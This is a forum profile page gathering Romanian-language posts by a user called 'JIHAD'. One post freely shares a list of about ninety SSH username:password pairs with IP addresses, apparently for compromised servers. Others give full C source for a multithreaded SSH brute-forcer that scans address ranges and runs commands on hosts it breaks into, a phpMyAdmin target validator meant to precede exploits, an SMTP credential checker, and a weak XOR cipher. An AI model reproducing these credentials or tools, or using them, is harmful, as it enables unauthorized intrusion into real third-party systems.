- 
                Posts134
- 
                Joined
- 
                Last visited
- 
                Days Won1
Everything posted by JIHAD
- 
	Free. alex:alex 101.50.3.79 port: 22 alex:alex 203.186.74.18 port: 22 demo:demo 216.38.153.36 port: 22 ftpuser:1234 185.31.161.16 port: 22 ftpuser:ftpuser 100.33.15.29 port: 22 ftpuser:ftpuser123 113.108.110.61 port: 22 ftpuser:ftpuser123 119.18.63.15 port: 22 ftpuser:ftpuser 124.254.9.41 port: 22 ftpuser:ftpuser 125.89.12.8 port: 22 ftpuser:ftpuser 171.65.124.20 port: 22 ftpuser:ftpuser 173.44.40.118 port: 22 ftpuser:ftpuser 176.9.2.102 port: 22 ftpuser:ftpuser 176.9.48.79 port: 22 ftpuser:ftpuser 180.153.151.49 port: 22 ftpuser:ftpuser 182.18.161.127 port: 22 ftpuser:ftpuser 183.131.12.61 port: 22 ftpuser:ftpuser 203.195.188.103 port: 22 ftpuser:ftpuser 210.14.79.185 port: 22 ftpuser:ftpuser 220.112.206.170 port: 22 guest:password 98.31.8.11 port: 22 john:john 69.64.57.58 port: 22 mary:mary 81.36.78.79 port: 22 mike:mike 195.66.155.161 port: 22 mysql:mysql 168.144.48.74 port: 22 nagios:nagios 111.93.105.51 port: 22 nagios:nagios 113.31.81.10 port: 22 nagios:nagios 113.31.81.15 port: 22 nagios:nagios 113.31.81.16 port: 22 nagios:nagios 113.31.81.17 port: 22 nagios:nagios 113.31.81.18 port: 22 nagios:nagios 113.31.81.20 port: 22 nagios:nagios 113.31.81.24 port: 22 nagios:nagios 113.31.81.34 port: 22 nagios:nagios 113.31.81.47 port: 22 nagios:nagios 113.31.81.51 port: 22 nagios:nagios 113.31.81.59 port: 22 nagios:nagios 113.31.81.61 port: 22 nagios:nagios 121.14.117.61 port: 22 nagios:nagios123 168.156.85.21 port: 22 nagios:nagios 168.156.85.21 port: 22 nagios:nagios 199.19.111.134 port: 22 nagios:nagios 201.151.167.89 port: 22 nagios:nagios 207.154.90.193 port: 22 nagios:nagios 212.45.141.7 port: 22 nagios:nagios 222.122.179.118 port: 22 nagios:nagios 50.16.26.32 port: 22 nagios:nagios 85.25.48.59 port: 22 public:public 128.125.76.37 port: 22 student:student 92.63.65.58 port: 22 student:student 92.63.72.65 port: 22 temp:temp 210.14.79.40 port: 22 test:test 107.23.51.11 port: 22 test:test 109.73.14.103 port: 22 test:test 119.28.5.84 port: 22 test:test 176.99.10.132 port: 22 test:test 176.99.10.146 port: 22 test:test 176.99.10.154 port: 22 test:test 176.99.10.157 port: 22 test:test 176.99.11.137 port: 22 test:test 176.99.9.125 port: 22 test:test 176.99.9.171 port: 22 test:test 176.99.9.52 port: 22 test:test 176.99.9.60 port: 22 test:test 176.99.9.61 port: 22 test:test 176.99.9.65 port: 22 test:test 180.153.151.96 port: 22 test:test 194.158.52.106 port: 22 test:test 196.35.44.105 port: 22 test:test 202.120.143.114 port: 22 test:test 210.14.79.40 port: 22 test:test 211.137.44.120 port: 22 test:test 212.127.65.79 port: 22 test:test 218.24.104.59 port: 22 test:test 221.174.125.132 port: 22 test:test 221.6.13.170 port: 22 test:test 69.67.52.43 port: 22 test:test 81.19.13.18 port: 22 test:test 81.19.13.2 port: 22 test:test 81.19.13.3 port: 22 user:user 105.96.104.46 port: 22 user:user 190.60.69.10 port: 22 user:user 202.77.114.54 port: 22 user:user 210.69.150.205 port: 22 user:user 220.157.107.131 port: 22 www:www 119.254.6.11 port: 22
- 
	Bun ptr. studenti CCNA, CCNP si altele. Graphical Network Simulator - GNS3
- 
	termina website-ul, un site incomplet goneste vizitatorii. Chiar daca oferi serviciul gratuit, daca vrei sa strangi eventual "clienti" seriosi, trebuie sa fii atent la continut. Altfel spus, arata f. bine.
- 
	pare interesant din ce am citit, dar pacat ca nu-l pot folosi ptr. ca sunt pe linux. o interfata web-based ar fi fost utila, nu zic de o portare pe linux ca ar insemna o munca fara rost. oricum, bv.
- 
	trebuie sa modifici sa nu mai ai atatea argumente, si in main si in scan.
- 
	poti face, ai functia scan, incarci doar passfile, bagi un split la fiecare linie cu separator ":" si ai user si pass. succes.
- 
	Salut, Scanner-ul foloseste libssh2 (libssh2), pscan.c(inclus in codul sursa). Se ruleaza ptr. scan clasa B: ./brute -b 10.10 -t 1800 -user users.lst -pass pass.lst -p 22 -c "uname -a" Ptr. brute lista ip: ./brute -f ip.lst -t 1800 -user users.lst -pass pass.lst -p 22 -c "uname -a" -t = numarul de thread-uri -p = portul -c = "comanda de executat ip.lst = lista ip-uri cate unul per rand user.lst = lista users, cate unu per rand, pass.lst = lista parole, cate una per rand in pass.lst daca puneti $user, atunci parola va fi ca userul, daca puneti $user123, parola va fi, user123, de ex: user: oracle pass: $user123 scannerul va incerca oracle:oracle123 Sper sa va placa. Initial avea si generare de IP-uri random, dar am scos. Reverificati codul sursa daca va apar erori la compilare. #define LIBSSH2_STATIC 1 #include "libssh2_config.h" #include <libssh2.h> #ifdef HAVE_WINSOCK2_H # include <winsock2.h> #endif #ifdef HAVE_SYS_SOCKET_H # include <sys/socket.h> #endif #ifdef HAVE_NETINET_IN_H # include <netinet/in.h> #endif #ifdef HAVE_SYS_SELECT_H # include <sys/select.h> #endif # ifdef HAVE_UNISTD_H #include <unistd.h> #endif #ifdef HAVE_ARPA_INET_H # include <arpa/inet.h> #endif #include <sys/time.h> #include <sys/types.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <errno.h> #include <stdio.h> #include <ctype.h> #include <netdb.h> #include <time.h> #include <sys/wait.h> #include <termios.h> #define ALB "\033[1;37m" #define ALB2 "\033[5;37m" #define NORM "\033[00;00m" #define BOLD "\033[00;01m" #define ROSU "\033[01;31m" #define GALBE "\033[01;33m" #define VERDE "\033[01;32m" #define ALBASTRU "\033[01;34m" #define FAKE "./jahid" #define COMPUTATIONS 3000 #define TOTAL_VAL_COUNT 254 #define MAX_SOCKETS 1000 #define TIMEOUT 3 #define S_NONE 0 #define S_CONNECTING 1 #define TABLELEN 63 #define BUFFFERLEN 128 #define ENCODERLEN 4 #define ENCODEROPLEN 0 #define ENCODERBLOCKLEN 3 #define PADDINGCHAR '=' #define BASE64CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ"\ "abcdefghijklmnopqrstuvwxyz"\ "0123456789"\ "+/"; #define _FILE_OFFSET_BITS 64 #define EOL '\n' #define CAR_RETURN '\r' #define SUCCESS 0 #define FAILURE -1 struct conn_t { int s; char status; time_t a; struct sockaddr_in addr; }; struct conn_t connlist[MAX_SOCKETS]; void init_sockets(void); void check_sockets(void); void fatal(char *); FILE *outfd; int tot = 0; int flag,where; int numforks,maxf; unsigned char denominator = TOTAL_VAL_COUNT+1; char *replace_str(char *str, char *orig, char *rep) { static char buffer[4096]; char *p; if(!(p = strstr(str, orig))) return str; strncpy(buffer, str, p-str); buffer[p-str] = '\0'; sprintf(buffer+(p-str), "%s%s", rep, p+strlen(orig)); return buffer; } void init_sockets(void) { int i; for (i = 0; i < MAX_SOCKETS; i++) { connlist[i].status = S_NONE; memset((struct sockaddr_in *)&connlist[i].addr, 0, sizeof(struct sockaddr_in)); } return; } void check_sockets(void) { int i, ret; for (i = 0; i < MAX_SOCKETS; i++) { if ((connlist[i].a < (time(0) - TIMEOUT)) && (connlist[i].status == S_CONNECTING)) { close(connlist[i].s); connlist[i].status = S_NONE; } else if (connlist[i].status == S_CONNECTING) { ret = connect(connlist[i].s, (struct sockaddr *)&connlist[i].addr, sizeof(struct sockaddr_in)); if (ret == -1) { if (errno == EISCONN) { tot++; fprintf(outfd, "%s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr)); close(connlist[i].s); connlist[i].status = S_NONE; } if ((errno != EALREADY) && (errno != EINPROGRESS)) { close(connlist[i].s); connlist[i].status = S_NONE; } } else { tot++; fprintf(outfd, "%s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr)); close(connlist[i].s); connlist[i].status = S_NONE; } } } } void fatal(char *err) { int i; printf("Error: %s\n", err); for (i = 0; i < MAX_SOCKETS; i++) if (connlist[i].status >= S_CONNECTING) close(connlist[i].s); fclose(outfd); exit(EXIT_FAILURE); } static int waitsocket(int socket_fd, LIBSSH2_SESSION *session) { struct timeval timeout; int rc; fd_set fd; fd_set *writefd = NULL; fd_set *readfd = NULL; int dir; timeout.tv_sec = 2; timeout.tv_usec = 0; FD_ZERO(&fd); FD_SET(socket_fd, &fd); dir = libssh2_session_block_directions(session); if(dir & LIBSSH2_SESSION_BLOCK_INBOUND) readfd = &fd; if(dir & LIBSSH2_SESSION_BLOCK_OUTBOUND) writefd = &fd; rc = select(socket_fd + 1, readfd, writefd, NULL, &timeout); return rc; } int checkauth(char *username,char *password,char *hostname, char *portar, char *command) { const char *commandline = command; FILE *vulnf,*nolog; unsigned long hostaddr; int sock, port; struct sockaddr_in sin; const char *fingerprint; LIBSSH2_SESSION *session; LIBSSH2_CHANNEL *channel; int rc; int exitcode; char *exitsignal=(char *)"none"; int bytecount = 0; size_t len; int type, var; struct timeval timeout; timeout.tv_sec = 10; timeout.tv_usec = 0; port=atoi(portar); rc = libssh2_init (0); if (rc != 0) { fprintf (stderr, "libssh2 initialization failed (%d)\n", rc); return 1; } hostaddr = inet_addr(hostname); sock = socket(AF_INET, SOCK_STREAM, 0); sin.sin_family = AF_INET; sin.sin_port = htons(port); sin.sin_addr.s_addr = hostaddr; if (setsockopt (sock, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (connect(sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)) != 0) { return -1; } session = libssh2_session_init(); while ((rc = libssh2_session_handshake(session, sock)) == LIBSSH2_ERROR_EAGAIN); if (rc) { return -1; } while ((rc = libssh2_userauth_password(session, username, password)) == LIBSSH2_ERROR_EAGAIN); if (rc) { goto shutdown; } while( (channel = libssh2_channel_open_session(session)) == NULL && libssh2_session_last_error(session,NULL,NULL,0) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( channel == NULL ) { goto shutdown; } while( (rc = libssh2_channel_exec(channel, commandline)) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( rc != 0 ) { goto shutdown; } for( ;; ) { int rc; do { char buffer[65535]; rc = libssh2_channel_read( channel, buffer, sizeof(buffer) ); if( rc > 0 ) { int i; bytecount += rc; hostname = strtok (hostname, "\n"); fprintf(stderr, "[*] WOW : %s:%s %s port: %s \n", username,password,hostname, portar); fprintf(stderr, "[*] Kernel: %s \n", buffer); vulnf=fopen("sparte.txt","a+"); fprintf(vulnf,"%s:%s %s port: %s --> %s \n",username,password,hostname,portar, buffer); fclose(vulnf); goto shutdown; for( i=0; i < rc; ++i ) var = i; } else { if( rc != LIBSSH2_ERROR_EAGAIN ) goto shutdown; } } while( rc > 0 ); if( rc == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } else break; } exitcode = 127; while( (rc = libssh2_channel_close(channel)) == LIBSSH2_ERROR_EAGAIN ) waitsocket(sock, session); if( rc == 0 ) { exitcode = libssh2_channel_get_exit_status( channel ); libssh2_channel_get_exit_signal(channel, &exitsignal, NULL, NULL, NULL, NULL, NULL); } if (exitsignal) var = var; else var = var; libssh2_channel_free(channel); close(sock); channel = NULL; libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing"); libssh2_session_free(session); libssh2_exit(); exit(0); shutdown: libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing"); libssh2_session_free(session); #ifdef WIN32 closesocket(sock); #else close(sock); #endif var = var; libssh2_exit(); return 0; } int scanbclass(char *bclass, char *port) { int done = 0, i, cip = 1, bb = 0, ret, k, ns, x; time_t scantime; char ip[20], outfile[128], last[256]; int unlink(const char *pathname); errno = 0; if(unlink("scan.log")) { printf("\n unlink() failed - [%s]\n",strerror(errno)); } memset(&outfile, 0, sizeof(outfile)); snprintf(outfile, sizeof(outfile) - 1, "scan.log", bclass, port); if (!(outfd = fopen(outfile, "a"))) { perror(outfile); exit(EXIT_FAILURE); } printf("[-] Searching: ", bclass); fflush(stdout); memset(&last, 0, sizeof(last)); init_sockets(); scantime = time(0); while(!done) { for (i = 0; i < MAX_SOCKETS; i++) { if (cip == 255) { if (bb == 255) { ns = 0; for (k = 0; k < MAX_SOCKETS; k++) { if (connlist[k].status > S_NONE) { ns++; break; } } if (ns == 0) done = 1; break; } else { cip = 0; bb++; for (x = 0; x < strlen(last); x++) putchar('\b'); memset(&last, 0, sizeof(last)); snprintf(last, sizeof(last) - 1, "%s.%d.* on port: %s [Found: %d] [%.1f%% Done]", bclass, bb, port, tot, (bb / 255.0) * 100); printf("%s", last); fflush(stdout); } } if (connlist[i].status == S_NONE) { connlist[i].s = socket(AF_INET, SOCK_STREAM, 0); if (connlist[i].s == -1) printf("Unable to allocate socket.\n"); else { ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK); if (ret == -1) { printf("Unable to set O_NONBLOCK\n"); close(connlist[i].s); } else { memset(&ip, 0, 20); sprintf(ip, "%s.%d.%d", bclass, bb, cip); connlist[i].addr.sin_addr.s_addr = inet_addr(ip); if (connlist[i].addr.sin_addr.s_addr == -1) fatal("Invalid IP."); connlist[i].addr.sin_family = AF_INET; connlist[i].addr.sin_port = htons(atoi(port)); connlist[i].a = time(0); connlist[i].status = S_CONNECTING; cip++; } } } } check_sockets(); } printf("\n[!] Scanning complete In %u Seconds. [We got %d ips]\n", (time(0) - scantime), tot); fclose(outfd); return 1; } int line_count(char* __str_file_name) { FILE* fd; int ch; if ((fd = fopen(__str_file_name, "r")) == NULL) { printf("[Error] : While opening the file\n"); exit(0); } unsigned int line_count = 0; while ( (ch = fgetc(fd)) != EOF) if (ch == EOL || ch == CAR_RETURN) ++line_count; if (fd) { fclose(fd); } return line_count; } int scan(char *app, char *thr, char *ipfile, char *userfile, char *passfile, char *portar, char *commandline) { int numforks, maxf, status; FILE *fp,*passf, *userf; char buff[4096]; char nutt2[4096]; char nutt[4096]; char *pass, *user; malloc(sizeof(nutt)); malloc(sizeof(nutt2)); malloc(sizeof(buff)); pid_t PID; char *ns = NULL; maxf=atoi(thr); if((userf=fopen(userfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s \n", userfile)); while (fgets(nutt2,sizeof(nutt2),userf)){ user = strdup (nutt2); user = strtok (user, "\n"); if((passf=fopen(passfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s \n", passfile)); while (fgets(nutt,sizeof(nutt),passf)) { pass = strdup (nutt); pass = strtok (pass, "\n"); ns = replace_str(pass, "$user", user); printf("[*] Trying: %s:%s on found ips\n",user,ns); if((fp=fopen(ipfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s", ipfile)); while(fgets(buff,sizeof(buff),fp)) { PID = fork(); if (PID < 0) { fprintf(stderr, "[!] Couldn't fork!\n"); exit(1); } if (( PID == 0 )){ checkauth(user,ns,buff, portar, commandline); //printf("[*] Trying: %s:%s %s:%s Protocol:%s\n",user,ns, buff,portar,prot); exit(0); } else { numforks++; if (numforks > maxf) for (numforks; numforks > maxf; numforks--) PID = wait(&status); } } fclose(fp); } fclose(passf); } fclose(userf); exit(0); } int main(int argc, char *argv[]) { int input,i=0; FILE *fp,*passf, *userf, *scanf; char encodedoutput[BUFFFERLEN + 1] = ""; char decodedoutput[BUFFFERLEN + 1] = ""; char *userfile, *passfile, *command, *threads, *scanfile, *bclass, *port, *t2, *prot; if(strcmp(argv[1],"-f")==0) { input = 1; } if(strcmp(argv[1],"-r")==0) { input = 2; } if(strcmp(argv[1],"-R")==0) { input = 3; } if(strcmp(argv[1],"-b")==0) { input = 4; } switch ( input ) { case 1: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } scanfile = argv[2]; if((scanf=fopen(scanfile,"r"))!= NULL){ if (atoi(threads)) { if (atoi(port) > 2) { if((userf=fopen(userfile,"r"))!=NULL){ if((passf=fopen(passfile,"r"))!=NULL){ if(command != NULL) { scan(argv[0],threads,scanfile,userfile,passfile,port,command);} else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } break; case 2: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } if (atoi(threads)) { if (atoi(port) > 2) { if((userf=fopen(userfile,"r"))!=NULL){ if((passf=fopen(passfile,"r"))!=NULL){ if(command != NULL) { //genrand(argv[0],threads,userfile,passfile,port,command); } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } break; case 3: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } } if (atoi(threads)) { if (atoi(port) > 2) { //genrandl(threads, port); } else { goto err; } } else { goto err; } break; case 4: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } bclass = argv[2]; if (atoi(threads)) { if (atoi(port) > 2) { if((userf=fopen(userfile,"r"))!=NULL){ if((passf=fopen(passfile,"r"))!=NULL){ if(command != NULL) { scanbclass(bclass, port); scan(argv[0],threads,"scan.log",userfile,passfile,port, command); } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } break; default: printf( "Bad command, quitting!\n" ); exit (0); break; } getchar(); exit (0); err: exit (-1); } JIHAD!
- 
	Salut, in rumatorul exemplu o sa va arat un link validator folosind sockets in Linux C. In acest exemplu am folosit PMA ca target. Incercam sa validam daca fisierul respectiv exista si daca este PMA. Exemplul este bun ptr. a realiza scanner de PMA sau orice are nevoie de validare ptr. a rula exploit. #ifdef HAVE_WINSOCK2_H # include <winsock2.h> #endif #ifdef HAVE_SYS_SOCKET_H # include <sys/socket.h> #endif #ifdef HAVE_NETINET_IN_H # include <netinet/in.h> #endif #ifdef HAVE_SYS_SELECT_H # include <sys/select.h> #endif # ifdef HAVE_UNISTD_H #include <unistd.h> #endif #ifdef HAVE_ARPA_INET_H # include <arpa/inet.h> #endif #include <sys/time.h> #include <sys/types.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <errno.h> #include <stdio.h> #include <ctype.h> #include <netdb.h> #include <time.h> #include <sys/wait.h> #include <termios.h> #define USERAGENT "JIHAD HTTP AGENT" int checkpage(char *hostname, char *port, char *page) { char *authok = "Set-Cookie: phpMyAdmin="; int socket_desc; struct sockaddr_in server; char server_reply[2000]; char message[2000]; struct timeval timeout; timeout.tv_sec = 3; timeout.tv_usec = 0; socket_desc = socket(AF_INET , SOCK_STREAM , 0); if (socket_desc == -1) { return 1; } server.sin_addr.s_addr = inet_addr(hostname); server.sin_family = AF_INET; server.sin_port = htons( atoi(port) ); if (setsockopt (socket_desc, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (setsockopt (socket_desc, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (connect(socket_desc , (struct sockaddr *)&server , sizeof(server)) < 0) { return 1; } sprintf(message,"GET %s HTTP/1.0\r\nHost: %s\r\nUser-Agent: %s\r\n\r\n", page, hostname, USERAGENT); if( send(socket_desc , message , strlen(message), 0) < 0) { return 1; } if( recv(socket_desc, server_reply , 2000 , 0) < 0) { return 1; } if(strstr(server_reply, authok) != NULL) { fprintf(stderr, "[*] OK : %s:%s%s \n", hostname, port, page); close(socket_desc); exit (0); } else { fprintf(stderr, "[*] NOT OK : %s:%s%s \n", hostname, port, page); close(socket_desc); exit (0); } close(socket_desc); exit (0); } int main(int argc, char **argv) { checkpage(argv[1],argv[2], argv[3]); } Rulam: liviu@superstars:~/jihad-pma$ ./tutorial 64.46.50.34 80 /phpmyadmin/scripts/setup.php <p>[*] OK : 64.46.50.34:80/phpmyadmin/scripts/setup.php </p> liviu@superstars:~/jihad-pma$ ./tutorial 64.46.50.34 80 /phpmyadmin/scripts/setup.php2 <p>[*] NOT OK : 64.46.50.34:80/phpmyadmin/scripts/setup.php2 </p>
- 
	n-am vrut sa para ca m-am suparat sau agitat, ideea e ca eram interesat sa stiu care sunt cazurile cand este nevoie de CRLF. ce server, etc? asa "sunt cazuri.." pare f. vag. vroiam sa stiu in ce conditii e nevoie de CRLF. PS: stiu ca am edit, dar eram pe telefon mai devreme, mai usor mi s-a parut sa raspund asa.
- 
	argumenteaza prin exemplu practic, nu doar din auzite. e sectiunea programare, nu sectiunea post hunting.
- 
	sunt cazuri, asta e doar unul. trimiti EHLO, metoda de autentificare, si user parola criptate base64
- 
	autentificare smtp non-ssl. #ifdef HAVE_WINSOCK2_H # include <winsock2.h> #endif #ifdef HAVE_SYS_SOCKET_H # include <sys/socket.h> #endif #ifdef HAVE_NETINET_IN_H # include <netinet/in.h> #endif #ifdef HAVE_SYS_SELECT_H # include <sys/select.h> #endif # ifdef HAVE_UNISTD_H #include <unistd.h> #endif #ifdef HAVE_ARPA_INET_H # include <arpa/inet.h> #endif #include <sys/time.h> #include <sys/types.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <errno.h> #include <stdio.h> #include <ctype.h> #include <netdb.h> #include <time.h> #include <sys/wait.h> #include <termios.h> #define TABLELEN 63 #define BUFFFERLEN 128 #define ENCODERLEN 4 #define ENCODEROPLEN 0 #define ENCODERBLOCKLEN 3 #define PADDINGCHAR '=' #define BASE64CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ"\ "abcdefghijklmnopqrstuvwxyz"\ "0123456789"\ "+/"; int Base64Encode(char *input, char *output, int oplen); int encodeblock(char *input, char *output, int oplen); int Base64Decode(char *input, char *output, int oplen); int decodeblock(char *input, char *output, int oplen); int encodeblock(char *input, char *output, int oplen){ int rc = 0, iplen = 0; char encodedstr[ENCODERLEN + 1] = ""; char encodingtabe[TABLELEN + 1] = BASE64CHARSET; iplen = strlen(input); encodedstr[0] = encodingtabe[ input[0] >> 2 ]; encodedstr[1] = encodingtabe[ ((input[0] & 0x03) << 4) | ((input[1] & 0xf0) >> 4) ]; encodedstr[2] = (iplen > 1 ? encodingtabe[ ((input[1] & 0x0f) << 2) | ((input[2] & 0xc0) >> 6) ] : PADDINGCHAR); encodedstr[3] = (iplen > 2 ? encodingtabe[ input[2] & 0x3f ] : PADDINGCHAR); strncat(output, encodedstr, oplen-strlen(output)); return rc; } int Base64Encode(char *input, char *output, int oplen){ int rc = 0; int index = 0, ipindex = 0, iplen = 0; char encoderinput[ENCODERBLOCKLEN + 1] = ""; iplen = strlen(input); while(ipindex < iplen){ for(index = 0; index < 3; index++){ if(ipindex < iplen){ encoderinput[index] = input[ipindex]; }else{ encoderinput[index] = 0; } ipindex++; } rc = encodeblock(encoderinput, output, oplen); } return rc; } int checkauth(char *username,char *password,char *hostname) { char *authok = "Authentication successful"; int rc = 0; char user[BUFFFERLEN + 1] = ""; char pass[BUFFFERLEN + 1] = ""; int socket_desc; struct sockaddr_in server; char server_reply[2000]; char message[200]; struct timeval timeout; timeout.tv_sec = 3; timeout.tv_usec = 0; socket_desc = socket(AF_INET , SOCK_STREAM , 0); if (socket_desc == -1) { return 1; } server.sin_addr.s_addr = inet_addr(hostname); server.sin_family = AF_INET; server.sin_port = htons( 25 ); if (setsockopt (socket_desc, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (setsockopt (socket_desc, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (connect(socket_desc , (struct sockaddr *)&server , sizeof(server)) < 0) { return 1; } if( recv(socket_desc, server_reply , 2000 , 0) < 0) { return 1; } sprintf(message,"EHLO JIHAD\n"); if( send(socket_desc , message , strlen(message) , 0) < 0) { return 1; } if( recv(socket_desc, server_reply , 2000 , 0) < 0) { return 1; } sprintf(message,"auth login\n"); if( send(socket_desc , message , strlen(message) , 0) < 0) { return 1; } if( recv(socket_desc, server_reply , 2000 , 0) < 0) { return 1; } rc = Base64Encode(username, user, BUFFFERLEN); sprintf(message, "%s\n", user); if( send(socket_desc , message , strlen(message) , 0) < 0) { return 1; } if( recv(socket_desc, server_reply , 2000 , 0) < 0) { return 1; } rc = Base64Encode(password, pass, BUFFFERLEN); sprintf(message, "%s \n", pass); if( send(socket_desc , message , strlen(message) , 0) < 0) { return 1; } if( recv(socket_desc, server_reply , 2000 , 0) < 0) { return 1; } if(strstr(server_reply, authok) != NULL) { fprintf(stderr, "[*] OK : %s:%s %s \n", username,password,hostname); close(socket_desc); } else { fprintf(stderr, "[*] NOT OK : %s:%s %s \n", username,password,hostname); close(socket_desc); exit (1); } } int main (int argc, char **argv) { checkauth(argv[1],argv[2], argv[3]); }
- 
	Exemplu de criptare XOR. String -> base64 -> XOR -> base64. avem si encryption key. se compileaza. se executa ./enc -e string ptr. criptare si ./enc -d hash ptr. decriptare #include <stdio.h> #include <string.h> #include <stdlib.h> #define TABLELEN 63 #define BUFFFERLEN 128 #define ENCODERLEN 4 #define ENCODEROPLEN 0 #define ENCODERBLOCKLEN 3 #define PADDINGCHAR '=' #define BASE64CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ"\ "abcdefghijklmnopqrstuvwxyz"\ "0123456789"\ "+/"; char key[100]="pass123"; int Base64Encode(char *input, char *output, int oplen); int encodeblock(char *input, char *output, int oplen); int Base64Decode(char *input, char *output, int oplen); int decodeblock(char *input, char *output, int oplen); int decodeblock(char *input, char *output, int oplen){ int rc = 0; char decodedstr[ENCODERLEN + 1] = ""; decodedstr[0] = input[0] << 2 | input[1] >> 4; decodedstr[1] = input[1] << 4 | input[2] >> 2; decodedstr[2] = input[2] << 6 | input[3] >> 0; strncat(output, decodedstr, oplen-strlen(output)); return rc; } int Base64Decode(char *input, char *output, int oplen){ char *charval = 0; char decoderinput[ENCODERLEN + 1] = ""; char encodingtabe[TABLELEN + 1] = BASE64CHARSET; int index = 0, asciival = 0, computeval = 0, iplen = 0, rc = 0; iplen = strlen(input); while(index < iplen){ asciival = (int)input[index]; if(asciival == PADDINGCHAR){ rc = decodeblock(decoderinput, output, oplen); break; }else{ charval = strchr(encodingtabe, asciival); if(charval){ decoderinput[computeval] = charval - encodingtabe; computeval = (computeval + 1) % 4; if(computeval == 0){ rc = decodeblock(decoderinput, output, oplen); decoderinput[0] = decoderinput[1] = decoderinput[2] = decoderinput[3] = 0; } } } index++; } return rc; } int encodeblock(char *input, char *output, int oplen){ int rc = 0, iplen = 0; char encodedstr[ENCODERLEN + 1] = ""; char encodingtabe[TABLELEN + 1] = BASE64CHARSET; iplen = strlen(input); encodedstr[0] = encodingtabe[ input[0] >> 2 ]; encodedstr[1] = encodingtabe[ ((input[0] & 0x03) << 4) | ((input[1] & 0xf0) >> 4) ]; encodedstr[2] = (iplen > 1 ? encodingtabe[ ((input[1] & 0x0f) << 2) | ((input[2] & 0xc0) >> 6) ] : PADDINGCHAR); encodedstr[3] = (iplen > 2 ? encodingtabe[ input[2] & 0x3f ] : PADDINGCHAR); strncat(output, encodedstr, oplen-strlen(output)); return rc; } int Base64Encode(char *input, char *output, int oplen){ int rc = 0; int index = 0, ipindex = 0, iplen = 0; char encoderinput[ENCODERBLOCKLEN + 1] = ""; iplen = strlen(input); while(ipindex < iplen){ for(index = 0; index < 3; index++){ if(ipindex < iplen){ encoderinput[index] = input[ipindex]; }else{ encoderinput[index] = 0; } ipindex++; } rc = encodeblock(encoderinput, output, oplen); } return rc; } int main(int argc, char **argv) { int rc = 0; char encodedoutput[BUFFFERLEN + 1] = ""; char decodedoutput[BUFFFERLEN + 1] = ""; int i; if(strcmp(argv[1],"-e")==0) { encrypt(argv[2],encodedoutput ); printf ("%s \n", encodedoutput); } if(strcmp(argv[1],"-d")==0) { decrypt(argv[2],decodedoutput ); printf ("%s \n", decodedoutput); } } int encrypt(char *inputs, char encodedoutput[BUFFFERLEN + 1], char decodedoutput[BUFFFERLEN + 1]){ char encodedoutput1[BUFFFERLEN + 1] = ""; int i; int rc = 0; rc = Base64Encode(inputs, encodedoutput1, BUFFFERLEN); for(i=0; i<strlen(encodedoutput1); i++) { encodedoutput1[i]=encodedoutput1[i]^key[i]; } rc = Base64Encode(encodedoutput1, encodedoutput, BUFFFERLEN); return 0; } int decrypt(char *inputs, char encodedoutput[BUFFFERLEN + 1], char decodedoutput[BUFFFERLEN + 1]){ char decodedoutput1[BUFFFERLEN + 1] = ""; int i; int rc = 0; rc = Base64Decode(inputs, decodedoutput1, BUFFFERLEN); for(i=0; i<strlen(decodedoutput1); i++) { decodedoutput1[i]=decodedoutput1[i]^key[i]; } rc = Base64Decode(decodedoutput1, decodedoutput, BUFFFERLEN); return 0; }
 
		 
         
                